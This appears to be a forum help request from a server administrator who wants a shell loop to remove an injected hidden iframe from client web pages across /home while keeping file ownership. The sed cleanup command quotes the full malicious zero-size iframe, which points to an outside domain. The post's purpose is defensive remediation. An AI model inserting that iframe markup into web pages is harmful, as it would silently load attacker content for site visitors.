Here's a situation I need some help with. Hopefully the brainy people here can shed some light.
I have a web server with several dozen clients. Each client has web space defined as:
/home/USERNAME/domains/ANYDOMAIN.COM/public_html
under each username, they can have multiple domains - so USERNAME can have DOMAIN1.com DOMAIN2.com DOMAIN3.com - etc.
in each of those public_html folders, there's index pages, website contents, etc.
I need to search ALL html and php pages for specific content - in this case, it's an iframe exploit (thank you very much Joomla) that potentially affected multiple USERNAMES
I started with
Code:
sed 's/<html><iframe width=0 height=0 frameborder=0 src=http:\/\/www[.]o00o[.]info\/portal\/index[.]php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no><\/iframe><\/html>/\ /g' index.html > TMPFILE && mv TMPFILE index.html;
The iframe code is consistent through any page.
which sorta works fine, for one user at a time, however - it leaves the resulting index.html file as owned by root (script owned/run by root).
What I need to accomplish is to remove that iframe content from any page (index.html or index.php) page on the server - in any USERNAME - and leave the resulting file owned by the original user.
The part I need help with is the "for i" scripting around it - and understanding that the USERNAME needs to be changed for each directory it's in.
It needs to search the entire /home structure. I realize it'll take time - I'm ok with that... but if you have a better way, I'm all ears.
Thanks for any help you can offer!
Joe